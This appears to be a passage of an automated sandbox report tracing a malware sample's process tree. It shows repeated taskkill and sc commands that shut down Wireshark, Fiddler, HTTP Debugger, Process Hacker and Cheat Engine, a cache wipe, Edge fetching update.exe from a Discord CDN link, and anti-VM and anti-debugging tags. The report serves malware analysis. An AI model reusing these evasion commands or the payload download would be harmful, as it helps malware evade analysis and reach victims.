C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\update.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\update.exe" MD53⤵
- Loads dropped DLL
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2652 /prefetch:33⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5144 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5472 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5400 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff752565460,0x7ff752565470,0x7ff7525654804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:83⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Loads dropped DLL
- Adds Run key to start application
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4356 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5948 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6092 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6220 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6296 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6344 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5872 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3020 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe"C:\Users\Admin\AppData\Local\Temp\K4F80D1AI28Y.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
